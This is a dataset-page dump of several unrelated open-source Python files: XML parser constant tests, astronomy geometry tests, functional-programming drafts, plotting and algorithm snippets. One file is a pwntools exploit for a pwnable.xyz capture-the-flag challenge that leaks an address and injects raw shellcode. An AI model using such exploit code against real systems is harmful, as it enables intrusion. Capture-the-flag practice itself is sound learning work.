self.assertEqual(NSXMLParserInvalidHexCharacterRefError, 6)
self.assertEqual(NSXMLParserInvalidDecimalCharacterRefError, 7)
self.assertEqual(NSXMLParserInvalidCharacterRefError, 8)
self.assertEqual(NSXMLParserInvalidCharacterError, 9)
self.assertEqual(NSXMLParserCharacterRefAtEOFError, 10)
self.assertEqual(NSXMLParserCharacterRefInPrologError, 11)
self.assertEqual(NSXMLParserCharacterRefInEpilogError, 12)
self.assertEqual(NSXMLParserCharacterRefInDTDError, 13)
self.assertEqual(NSXMLParserEntityRefAtEOFError, 14)
self.assertEqual(NSXMLParserEntityRefInPrologError, 15)
self.assertEqual(NSXMLParserEntityRefInEpilogError, 16)
self.assertEqual(NSXMLParserEntityRefInDTDError, 17)
self.assertEqual(NSXMLParserParsedEntityRefAtEOFError, 18)
self.assertEqual(NSXMLParserParsedEntityRefInPrologError, 19)
self.assertEqual(NSXMLParserParsedEntityRefInEpilogError, 20)
self.assertEqual(NSXMLParserParsedEntityRefInInternalSubsetError, 21)
self.assertEqual(NSXMLParserEntityReferenceWithoutNameError, 22)
self.assertEqual(NSXMLParserEntityReferenceMissingSemiError, 23)
self.assertEqual(NSXMLParserParsedEntityRefNoNameError, 24)
self.assertEqual(NSXMLParserParsedEntityRefMissingSemiError, 25)
self.assertEqual(NSXMLParserUndeclaredEntityError, 26)
self.assertEqual(NSXMLParserUnparsedEntityError, 28)
self.assertEqual(NSXMLParserEntityIsExternalError, 29)
self.assertEqual(NSXMLParserEntityIsParameterError, 30)
self.assertEqual(NSXMLParserUnknownEncodingError, 31)
self.assertEqual(NSXMLParserEncodingNotSupportedError, 32)
self.assertEqual(NSXMLParserStringNotStartedError, 33)
self.assertEqual(NSXMLParserStringNotClosedError, 34)
self.assertEqual(NSXMLParserNamespaceDeclarationError, 35)
self.assertEqual(NSXMLParserEntityNotStartedError, 36)
self.assertEqual(NSXMLParserEntityNotFinishedError, 37)
self.assertEqual(NSXMLParserLessThanSymbolInAttributeError, 38)
self.assertEqual(NSXMLParserAttributeNotStartedError, 39)
self.assertEqual(NSXMLParserAttributeNotFinishedError, 40)
self.assertEqual(NSXMLParserAttributeHasNoValueError, 41)
self.assertEqual(NSXMLParserAttributeRedefinedError, 42)
self.assertEqual(NSXMLParserLiteralNotStartedError, 43)
self.assertEqual(NSXMLParserLiteralNotFinishedError, 44)
self.assertEqual(NSXMLParserCommentNotFinishedError, 45)
self.assertEqual(NSXMLParserProcessingInstructionNotStartedError, 46)
self.assertEqual(NSXMLParserProcessingInstructionNotFinishedError, 47)
self.assertEqual(NSXMLParserNotationNotStartedError, 48)
self.assertEqual(NSXMLParserNotationNotFinishedError, 49)
self.assertEqual(NSXMLParserAttributeListNotStartedError, 50)
self.assertEqual(NSXMLParserAttributeListNotFinishedError, 51)
self.assertEqual(NSXMLParserMixedContentDeclNotStartedError, 52)
self.assertEqual(NSXMLParserMixedContentDeclNotFinishedError, 53)
self.assertEqual(NSXMLParserElementContentDeclNotStartedError, 54)
self.assertEqual(NSXMLParserElementContentDeclNotFinishedError, 55)
self.assertEqual(NSXMLParserXMLDeclNotStartedError, 56)
self.assertEqual(NSXMLParserXMLDeclNotFinishedError, 57)
self.assertEqual(NSXMLParserConditionalSectionNotStartedError, 58)
self.assertEqual(NSXMLParserConditionalSectionNotFinishedError, 59)
self.assertEqual(NSXMLParserExternalSubsetNotFinishedError, 60)
self.assertEqual(NSXMLParserDOCTYPEDeclNotFinishedError, 61)
self.assertEqual(NSXMLParserMisplacedCDATAEndStringError, 62)
self.assertEqual(NSXMLParserCDATANotFinishedError, 63)
self.assertEqual(NSXMLParserMisplacedXMLDeclarationError, 64)
self.assertEqual(NSXMLParserSpaceRequiredError, 65)
self.assertEqual(NSXMLParserSeparatorRequiredError, 66)
self.assertEqual(NSXMLParserNMTOKENRequiredError, 67)
self.assertEqual(NSXMLParserNAMERequiredError, 68)
self.assertEqual(NSXMLParserPCDATARequiredError, 69)
self.assertEqual(NSXMLParserURIRequiredError, 70)
self.assertEqual(NSXMLParserPublicIdentifierRequiredError, 71)
self.assertEqual(NSXMLParserLTRequiredError, 72)
self.assertEqual(NSXMLParserGTRequiredError, 73)
self.assertEqual(NSXMLParserLTSlashRequiredError, 74)
self.assertEqual(NSXMLParserEqualExpectedError, 75)
self.assertEqual(NSXMLParserTagNameMismatchError, 76)
self.assertEqual(NSXMLParserUnfinishedTagError, 77)
self.assertEqual(NSXMLParserStandaloneValueError, 78)
self.assertEqual(NSXMLParserInvalidEncodingNameError, 79)
self.assertEqual(NSXMLParserCommentContainsDoubleHyphenError, 80)
self.assertEqual(NSXMLParserInvalidEncodingError, 81)
self.assertEqual(NSXMLParserExternalStandaloneEntityError, 82)
self.assertEqual(NSXMLParserInvalidConditionalSectionError, 83)
self.assertEqual(NSXMLParserEntityValueRequiredError, 84)
self.assertEqual(NSXMLParserNotWellBalancedError, 85)
self.assertEqual(NSXMLParserExtraContentError, 86)
self.assertEqual(NSXMLParserInvalidCharacterInEntityError, 87)
self.assertEqual(NSXMLParserParsedEntityRefInInternalError, 88)
self.assertEqual(NSXMLParserEntityRefLoopError, 89)
self.assertEqual(NSXMLParserEntityBoundaryError, 90)
self.assertEqual(NSXMLParserInvalidURIError, 91)
self.assertEqual(NSXMLParserURIFragmentError, 92)
self.assertEqual(NSXMLParserNoDTDError, 94)
self.assertEqual(NSXMLParserDelegateAbortedParseError, 512)
self.assertIsInstance(NSXMLParserErrorDomain, unicode)
self.assertEqual(NSXMLParserResolveExternalEntitiesNever, 0)
self.assertEqual(NSXMLParserResolveExternalEntitiesNoNetwork, 1)
self.assertEqual(NSXMLParserResolveExternalEntitiesSameOriginOnly, 2)
self.assertEqual(NSXMLParserResolveExternalEntitiesAlways, 3)
def testMethods(self):
self.assertArgIsBOOL(NSXMLParser.setShouldProcessNamespaces_, 0)
self.assertArgIsBOOL(NSXMLParser.setShouldReportNamespacePrefixes_, 0)
self.assertArgIsBOOL(NSXMLParser.setShouldResolveExternalEntities_, 0)
self.assertResultIsBOOL(NSXMLParser.shouldProcessNamespaces)
self.assertResultIsBOOL(NSXMLParser.shouldReportNamespacePrefixes)
self.assertResultIsBOOL(NSXMLParser.shouldResolveExternalEntities)
self.assertResultIsBOOL(NSXMLParser.parse)
@min_sdk_level("10.6")
def testProtocols(self):
objc.protocolNamed("NSXMLParserDelegate")
if __name__ == "__main__":
main()
| [
"ronaldoussoren@mac.com"
] | ronaldoussoren@mac.com |
493732ef5e682d77728de4f09cfa5661fafc89c7 | ded5e3001325a4d27569c2f41079a68762a82506 | /photutils/isophote/tests/test_geometry.py | 429a7ec42fd613a4cad8afbb2770360e7317e26a | [
"BSD-3-Clause"
] | permissive | chaorun/photutils | fd326aa3b799aeaa07cc97a9274343f64bc21ef9 | 412e0d9907eecd88402913f0787e27065644e473 | refs/heads/master | 2022-10-06T22:16:39.834650 | 2022-09-19T18:03:54 | 2022-09-19T18:03:54 | 71,716,518 | 0 | 0 | null | 2016-10-23T16:55:33 | 2016-10-23T16:55:33 | null | UTF-8 | Python | false | false | 4,934 | py | # Licensed under a 3-clause BSD style license - see LICENSE.rst
"""
Tests for the geometry module.
"""
import numpy as np
from numpy.testing import assert_allclose
import pytest
from ..geometry import EllipseGeometry
@pytest.mark.parametrize('astep, linear_growth', [(0.2, False), (20., True)])
def test_geometry(astep, linear_growth):
geometry = EllipseGeometry(255., 255., 100., 0.4, np.pi / 2, astep,
linear_growth)
sma1, sma2 = geometry.bounding_ellipses()
assert_allclose((sma1, sma2), (90.0, 110.0), atol=0.01)
# using an arbitrary angle of 0.5 rad. This is to avoid a polar
# vector that sits on top of one of the ellipse's axis.
vertex_x, vertex_y = geometry.initialize_sector_geometry(0.6)
assert_allclose(geometry.sector_angular_width, 0.0571, atol=0.01)
assert_allclose(geometry.sector_area, 63.83, atol=0.01)
assert_allclose(vertex_x, [215.4, 206.6, 213.5, 204.3], atol=0.1)
assert_allclose(vertex_y, [316.1, 329.7, 312.5, 325.3], atol=0.1)
def test_to_polar():
# trivial case of a circle centered in (0.,0.)
geometry = EllipseGeometry(0., 0., 100., 0.0, 0., 0.2, False)
r, p = geometry.to_polar(100., 0.)
assert_allclose(r, 100., atol=0.1)
assert_allclose(p, 0., atol=0.0001)
r, p = geometry.to_polar(0., 100.)
assert_allclose(r, 100., atol=0.1)
assert_allclose(p, np.pi / 2., atol=0.0001)
# vector with length 100. at 45 deg angle
r, p = geometry.to_polar(70.71, 70.71)
assert_allclose(r, 100., atol=0.1)
assert_allclose(p, np.pi / 4., atol=0.0001)
# position angle tilted 45 deg from X axis
geometry = EllipseGeometry(0., 0., 100., 0.0, np.pi / 4., 0.2, False)
r, p = geometry.to_polar(100., 0.)
assert_allclose(r, 100., atol=0.1)
assert_allclose(p, np.pi * 7. / 4., atol=0.0001)
r, p = geometry.to_polar(0., 100.)
assert_allclose(r, 100., atol=0.1)
assert_allclose(p, np.pi / 4., atol=0.0001)
# vector with length 100. at 45 deg angle
r, p = geometry.to_polar(70.71, 70.71)
assert_allclose(r, 100., atol=0.1)
assert_allclose(p, np.pi * 2., atol=0.0001)
def test_area():
# circle with center at origin
geometry = EllipseGeometry(0., 0., 100., 0.0, 0., 0.2, False)
# sector at 45 deg on circle
vertex_x, vertex_y = geometry.initialize_sector_geometry(
45. / 180. * np.pi)
assert_allclose(vertex_x, [65.21, 79.70, 62.03, 75.81], atol=0.01)
assert_allclose(vertex_y, [62.03, 75.81, 65.21, 79.70], atol=0.01)
# sector at 0 deg on circle
vertex_x, vertex_y = geometry.initialize_sector_geometry(0)
assert_allclose(vertex_x, [89.97, 109.97, 89.97, 109.96], atol=0.01)
assert_allclose(vertex_y, [-2.25, -2.75, 2.25, 2.75], atol=0.01)
def test_area2():
# circle with center at 100.,100.
geometry = EllipseGeometry(100., 100., 100., 0.0, 0., 0.2, False)
# sector at 45 deg on circle
vertex_x, vertex_y = geometry.initialize_sector_geometry(
45. / 180. * np.pi)
assert_allclose(vertex_x, [165.21, 179.70, 162.03, 175.81], atol=0.01)
assert_allclose(vertex_y, [162.03, 175.81, 165.21, 179.70], atol=0.01)
# sector at 225 deg on circle
vertex_x, vertex_y = geometry.initialize_sector_geometry(
225. / 180. * np.pi)
assert_allclose(vertex_x, [34.79, 20.30, 37.97, 24.19], atol=0.01)
assert_allclose(vertex_y, [37.97, 24.19, 34.79, 20.30], atol=0.01)
def test_reset_sma():
geometry = EllipseGeometry(0., 0., 100., 0.0, 0., 0.2, False)
sma, step = geometry.reset_sma(0.2)
assert_allclose(sma, 83.33, atol=0.01)
assert_allclose(step, -0.1666, atol=0.001)
geometry = EllipseGeometry(0., 0., 100., 0.0, 0., 20., True)
sma, step = geometry.reset_sma(20.)
assert_allclose(sma, 80., atol=0.01)
assert_allclose(step, -20., atol=0.01)
def test_update_sma():
geometry = EllipseGeometry(0., 0., 100., 0.0, 0., 0.2, False)
sma = geometry.update_sma(0.2)
assert_allclose(sma, 120., atol=0.01)
geometry = EllipseGeometry(0., 0., 100., 0.0, 0., 20., True)
sma = geometry.update_sma(20.)
assert_allclose(sma, 120., atol=0.01)
def test_polar_angle_sector_limits():
geometry = EllipseGeometry(0., 0., 100., 0.3, np.pi / 4, 0.2, False)
geometry.initialize_sector_geometry(np.pi / 3)
phi1, phi2 = geometry.polar_angle_sector_limits()
assert_allclose(phi1, 1.022198, atol=0.0001)
assert_allclose(phi2, 1.072198, atol=0.0001)
def test_bounding_ellipses():
geometry = EllipseGeometry(0., 0., 100., 0.3, np.pi / 4, 0.2, False)
sma1, sma2 = geometry.bounding_ellipses()
assert_allclose((sma1, sma2), (90.0, 110.0), atol=0.01)
def test_radius():
geometry = EllipseGeometry(0., 0., 100., 0.3, np.pi / 4, 0.2, False)
r = geometry.radius(0.0)
assert_allclose(r, 100.0, atol=0.01)
r = geometry.radius(np.pi / 2)
assert_allclose(r, 70.0, atol=0.01)
| [
"larry.bradley@gmail.com"
] | larry.bradley@gmail.com |
70ac98d9dfba4a7289fd21971f5fce26d9042a0d | 99c77a1816f2c3856f7ecb0b30ebd918ec72bb02 | /drafts/examples.py | 1ee9307ecbe8c56138872749ba7e726f9a99adde | [
"BSD-3-Clause"
] | permissive | aykut/funcy | 6b7bf80ed5d54b2d3b7d7cece239f2aeb75965f2 | 45aa6ad10ab3ea8f92f33cfc99615a7d1328ff61 | refs/heads/master | 2021-01-21T20:22:46.628680 | 2013-11-24T06:10:05 | 2013-11-24T06:10:05 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,471 | py | has_comment = re_tester(r'#')
value.value = walk_values(prepare, value.value)
json_field = partial(field, json=True)
re = lambda pattern: lambda value: re_test(pattern, value)
re = curry(re_test)
def translate_dict(d):
lines = ('%s: %s' % (k, v) for k, v in walk_values(translate, d).items())
return '{%s}' % ','.join(lines)
def _locals(func):
if func.__closure__:
names = func.__code__.co_freevars
values = [cell.cell_contents for cell in func.__closure__]
return zipdict(names, values)
else:
return {}
names = _code_names(code)
return merge(project(__builtins__, names), project(func.__globals__, names))
def closure(func):
return merge(_globals(func), _locals(func))
class namespace_meta(type):
def __new__(cls, name, bases, attrs):
attrs = walk_values(iffy(callable, staticmethod), attrs)
return super(namespace_meta, cls).__new__(cls, name, bases, attrs)
class namespace(object):
__metaclass__ = namespace_meta
names = chain.from_iterable(get_all_names(color))
try:
return ifilter(None, imap(COLOR_BY_NAME.get, names)).next()
except StopIteration:
return unknown()
etags = map(etag_from_response, responses)
etags = filter(None, etags)
phones = filter(None, map(stub_to_phone, _extract_stubs(text)))
return reduce(concat, map(extract_updates, rows))
op_js = ' %s ' % node.op.js
node.js = op_js.join(v.js for v in node.values)
' '.join(n.js for n in interpose(node.op, node.values))
mapcat(translate, interpose(node.op, node.values))
translate_items(interpose(node.op, node.values))
35: while self.exists(name):
36 name = name_fmt % i
37 i += 1
@property
def path(self):
parents = []
p = self
while p.parent:
p = p.parent
parents.append(p)
parents.reverse()
return parents
path = takewhile(bool, iterate(_.parent, self))
path = takewhile(bool, iterate(attrgetter('parent'), self))
path = takewhile(bool, iterate(lambda node: node.parent, self))
path = takewhile(notnone, iterate(lambda node: node.parent, self))
return reversed(rest(path))
users_cond = str_join(',', users)
tests = fetch_named('''
select user_id, full_min, full_max, datetime from player_testtracking
where %s and user_id in %s
order by user_id, datetime
''' % (USEFUL_TEST_COND, users_cond))
get_pairs = partial(partition, 2, 1)
return mapcat(get_pairs, ipartition_by(itemgetter(0), tests))
| [
"suor.web@gmail.com"
] | suor.web@gmail.com |
6a673f2479c8785346a9bc8dabf6c261ba4e522d | 27f4beaaf19b3d599d9cf18e8793b92a9bd52441 | /examples/plot_arrival_angles_static.py | 48c02e743ccc72f660c56e8a6b63c8ec5c6bca0e | [
"MIT"
] | permissive | annierak/odor_tracking_sim | da70b2bd01c3d2199e98bb05441b2a918aca1025 | 4600a7be942666c3a5a0f366dab6d14838f332a0 | refs/heads/master | 2021-04-27T22:07:33.015377 | 2019-07-04T00:36:56 | 2019-07-04T00:36:56 | 122,412,726 | 0 | 0 | MIT | 2018-02-22T00:48:39 | 2018-02-22T00:48:39 | null | UTF-8 | Python | false | false | 1,406 | py | import scipy
import math
import matplotlib.pyplot as plt
import cPickle as pickle
import sys
import odor_tracking_sim.utility as utility
f = sys.argv[1]
input_file = f+'.pkl'
with open(input_file,'r') as f:
(swarm,wind_field) = pickle.load(f)
trap_num_list = swarm.list_all_traps()
plt.figure(2)
ax1 = plt.subplot2grid((3,4),(1,3),polar=True)
ax2 = plt.subplot2grid((3,4),(0,2),polar=True)
ax3 = plt.subplot2grid((3,4),(0,1),polar=True)
ax4 = plt.subplot2grid((3,4),(1,0),polar=True)
ax5 = plt.subplot2grid((3,4),(2,1),polar=True)
ax6 = plt.subplot2grid((3,4),(2,2),polar=True)
trap_axes = [ax1,ax2,ax3,ax4,ax5,ax6]
num_bins = 20
# peak_counts = scipy.zeros(len(trap_axes))
for i in trap_num_list:
ax = trap_axes[i]
ax.set_yticks([])
ax.set_title('trap:{0}'.format(i))
arrival_angles = swarm.get_angle_trapped(i,[])
if len(arrival_angles)>0:
(n, bins, patches) = ax.hist(arrival_angles,num_bins,range=(0,2*scipy.pi))
# peak_counts[i]=max(n)
ax.set_xlabel('Arrival angle')
# top = max(peak_counts)
trap_counts = swarm.get_trap_counts()
print(trap_counts)
for i,num in enumerate(trap_num_list):
ax = trap_axes[num]
# ax.set_ylim(0,top)
xmin,xmax = ax.get_xlim()
ymin,ymax = ax.get_ylim()
ax.text(scipy.radians(270),ymin+(ymax-ymin)/2,str(int(trap_counts[i])),
color='maroon',size =20,horizontalalignment='center')
plt.show()
| [
"annie1rak@gmail.com"
] | annie1rak@gmail.com |
016ceae1fb089ac2590ce2b0ef4ad91a953cd33f | 52b5773617a1b972a905de4d692540d26ff74926 | /.history/foodDistribution_20200703204251.py | 500e39347904ba1f81a3ee35340998020d787544 | [] | no_license | MaryanneNjeri/pythonModules | 56f54bf098ae58ea069bf33f11ae94fa8eedcabc | f4e56b1e4dda2349267af634a46f6b9df6686020 | refs/heads/master | 2022-12-16T02:59:19.896129 | 2020-09-11T12:05:22 | 2020-09-11T12:05:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,668 | py | def food(arr):
# removes the item at index 0
sandwiches = arr.pop(0)
# this loop runs only when sandwiches are greater than 0,otherwise we exit the while loop
while sandwiches > 0:
highest = -1
maxred = -1
# looping throught the hunger levels
for i in range(len(arr)):
# checking if elements in the array are greater than 0
if arr[i] > 0:
currDiff = 0
# if index we are at ain't 0
if i > 0:
# we get the difference between adjacent pairs
currDiff = abs(arr[i]-arr[i-1])
print('here1')
print(arr[i],'-',arr[i-1],'==',currDiff)
if i < len(arr) -1:
currDiff =abs(arr[i] - arr[i+1])
print('here2')
print(arr[i],'-',arr[i-1],'==',currDiff)
newDiff = 0
if i > 0:
newDiff = abs(arr[i]-1 - arr[i-1])
print('here3')
print(arr[i]-1,'-',arr[i-1],'==',newDiff)
if i < len(arr)-1:
newDiff = abs(arr[i]-1-arr[i+1])
print('here4')
print(arr[i]-1,'-',arr[i+1],'==',newDiff)
red = currDiff - newDiff
if red > maxred:
highest = i
maxred = red
if highest == -1:
return 0
else:
arr[highest] = arr[highest]
# we get the difference
print(food([5, 3, 1, 2, 1]))
| [
"mary.jereh@gmail.com"
] | mary.jereh@gmail.com |
76b974be2a0f5441e010a43be073cb061a27fe05 | 24bd4ade62c73f92d7f8fa5f5f8d4b49efc6c829 | /Feature Selection.py | 2944e417655d7f5f3ebb154cf9a16c7d0a4e66ea | [
"MIT"
] | permissive | kuangzijian/Data-Preprocessing-and-Decision-Tree | ea4f13113e2a40c32ea2334dac3284ed843dd6a9 | a672cccfe74fdfdf1664305e21daebf956c53bfc | refs/heads/main | 2023-01-23T07:17:43.403216 | 2020-12-05T03:44:35 | 2020-12-05T03:44:35 | 302,569,770 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 845 | py | import numpy as np
from sklearn.feature_selection import SelectKBest
from sklearn.feature_selection import chi2
from sklearn.feature_selection import RFE
from sklearn import datasets, linear_model
# List all the columns of the dataset and report the size of the train part and test part
A = np.loadtxt(open('data/diabetes.csv', 'r'), delimiter=",", skiprows=1)
A = np.array(A)
x = A[:, 0:8]
y = A[:, 8]
print(x.shape)
# Use Chi squared feature selection approach to select 4 best features of the dataset
x_chi = SelectKBest(chi2, k=4).fit_transform(x, y)
print(x_chi.shape)
print(x_chi)
# Use Recursive Feature Elimination approach to select 4 best features of the dataset
estimator = linear_model.LinearRegression()
rfe = RFE(estimator, n_features_to_select=4, step=1)
rfe.fit(x, y)
x_rec = rfe.transform(x)
print(x_rec.shape)
print(x_rec)
| [
"kuangzijian1@hotmail.com"
] | kuangzijian1@hotmail.com |
c9753409076dcbbf2f799658fdd2575274b657c2 | 52b5773617a1b972a905de4d692540d26ff74926 | /.history/primeMover_20200714151021.py | 47cb0dc4deb41c8214b4217291596ba68847162a | [] | no_license | MaryanneNjeri/pythonModules | 56f54bf098ae58ea069bf33f11ae94fa8eedcabc | f4e56b1e4dda2349267af634a46f6b9df6686020 | refs/heads/master | 2022-12-16T02:59:19.896129 | 2020-09-11T12:05:22 | 2020-09-11T12:05:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 536 | py | import math
def PrimeMover(num):
# maybe come up with a list of prime numbers from 0 to num+1
# return newArr[num]
# how do we come up with that list
# the len of this array should be num+1
newArr = []
count = 0
numbers = range(2,10**4)
for i in numbers:
if is_prime(i) == True:
# print(i)
count +=1
# print('count',count)
if count == num:
# print(i)
return i
def is_prime(number):
if number <=1:
return False
if number <=
print(PrimeMover(9)) | [
"mary.jereh@gmail.com"
] | mary.jereh@gmail.com |
8450999f90b1b3376b22bfb3db204e7d2308d460 | e210167f253547473d160d3c1c286b10ea3650a1 | /209.py | 9cdf1e1c4944c60ad5515e9350435eb445ac5436 | [] | no_license | cowarder/LeetCode | ee231f7bab0bb1525e187f770c15dbf339daba87 | 7d785a11fe2bd2bc3399984e0c0af8546780e185 | refs/heads/master | 2021-01-11T19:20:09.248360 | 2020-07-19T08:04:27 | 2020-07-19T08:04:27 | 79,439,657 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,416 | py | """
问题描述:
209. Minimum Size Subarray Sum
Given an array of n positive integers and a positive integer s, find the minimal length of a contiguous subarray of
which the sum ≥ s. If there isn't one, return 0 instead.
Example:
Input: s = 7, nums = [2,3,1,2,4,3]
Output: 2
Explanation: the subarray [4,3] has the minimal length under the problem constraint.
Follow up:
If you have figured out the O(n) solution, try coding another solution of which the time complexity is O(n log n).
"""
"""
解题思路:
求出数列中,连续和大于等于s的最短序列长度
考虑到数组中的连续问题,应该想到双指针
这里我们用两个指针left和right来表示求和数组的两端,当两端之间的和大于等于s的时候
需要将左边的指针右移,直到两个指针之间的和小于s
"""
class Solution(object):
def minSubArrayLen(self, s, nums):
"""
:type s: int
:type nums: List[int]
:rtype: int
"""
if len(nums)==0:
return 0
l = r = 0
min_num = float("inf")
tmp_sum = 0
while r < len(nums):
tmp_sum += nums[r]
r += 1
while tmp_sum >= s:
tmp_sum -= nums[l]
min_num = min(min_num, r-l)
l += 1
if min_num == float('inf'):
return 0
else:
return min_num | [
"1615482151@qq.com"
] | 1615482151@qq.com |
ae8b3cf0d41725d8e0bdc373ec63f37deac7fc30 | ea37a8cefb6639e87e9dcfaf047a08cc56c5059b | /executioner2/challenge/exploit.py | 705e2740f95f1e1d55a91cbf38786161a0a0fd36 | [] | no_license | AravGarg/pwnable.xyz-My-exploits | 9f0253a844a33f8583446d3eae34fa0110c57e52 | 9a97b4b85b889bd057f493081d27155cbea96c12 | refs/heads/master | 2022-12-01T08:02:32.385746 | 2020-07-31T11:36:41 | 2020-07-31T11:36:41 | 280,766,873 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 699 | py | from pwn import *
while(True):
#target=process('./challenge')
target=remote('svc.pwnable.xyz',30028)
print(target.recvuntil("0x"))
leak=int(target.recvline().strip("\n"),16)
print(hex(leak))
if(leak%0x10!=0):
target.close()
continue
break
print(target.recvuntil("> "))
#sol=solve([x*(leak-x)%0x100000000-0x20])
#print(sol)
print(hex(0x10000000*(leak-0x10000000)))
target.sendline(str(leak-0x10000000)+" "+str(0x10000000))
pause()
shellcode="\x00\x02\x4C\x8B\x65\x00\x49\x81\xEC\xDA\x02\x00\x00\x41\xFF\xE4"
print(target.recvuntil(": "))
target.sendline(shellcode)
target.interactive()
target.interactive()
| [
"arav1635@gmail.com"
] | arav1635@gmail.com |
46f697365658fffc24989e1d4b613b36fb08ac8a | 72b77f97876983025eb05a5aa1d6f248a1be3074 | /reformat_the_string.py | 0b9f7353ad46168bc5bafff1dd3692a8845340cb | [
"Apache-2.0"
] | permissive | erjan/coding_exercises | 4c6bccb2cdac65ccbc3107a482914275ecd157f7 | 68dac358a6d4dabd41d47dbd4addb2ec50e0ca11 | refs/heads/master | 2023-09-02T07:25:30.886175 | 2023-08-27T06:13:06 | 2023-08-27T06:13:06 | 236,281,070 | 5 | 0 | Apache-2.0 | 2020-05-05T15:08:49 | 2020-01-26T07:32:09 | Python | UTF-8 | Python | false | false | 1,337 | py | '''
You are given an alphanumeric string s. (Alphanumeric string is a string consisting of lowercase English letters and digits).
You have to find a permutation of the string where no letter is followed by another letter and no digit is followed by another digit. That is, no two adjacent characters have the same type.
Return the reformatted string or return an empty string if it is impossible to reformat the string.
'''
class Solution:
def reformat(self, s: str) -> str:
if len(s) == 1:
print(s)
return s
d, c = [], []
for ch in s:
if ch.isdigit():
d.append(ch)
else:
c.append(ch)
if abs(len(d) - len(c)) > 1:
print('bad')
return ''
minlen = min(len(d), len(c))
res = ''
if len(d) - len(c) == 1:
for i in range(minlen):
res += d[i] + c[i]
print('more digits than chars')
res += d[-1]
elif len(c) - len(d) == 1:
for i in range(minlen):
res += c[i] + d[i]
print('more chars than digits')
res += c[-1]
elif len(c) == len(d):
for i in range(minlen):
res += c[i] + d[i]
print(res)
return res
| [
"noreply@github.com"
] | erjan.noreply@github.com |
1bcfeec89c5fc7aac268acfecb773764dbb81c78 | b84b66f071050213a18ea6824fae443271f7d166 | /0739_Daily_Temperatures.py | 35a67a047f5a1cf04ff520d9943d69a65f7bb8c6 | [] | no_license | oveis/LeetCode | c4c400196de0cae4cd963384c7cb4826aa11e078 | 9ea466f1ebfd976b60dfa2ff2e8b0b2e5c99a9b3 | refs/heads/master | 2021-06-26T04:32:16.373204 | 2021-01-02T08:13:09 | 2021-01-02T08:13:09 | 192,046,829 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 442 | py | class Solution(object):
def dailyTemperatures(self, T):
"""
:type T: List[int]
:rtype: List[int]
"""
ans = [0] * len(T)
stack = []
for idx, temp in enumerate(T):
while stack and stack[-1][0] < temp:
_, prev_i = stack.pop()
ans[prev_i] = idx - prev_i
stack.append((temp, idx))
return ans
| [
"jinil@nyu.edu"
] | jinil@nyu.edu |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.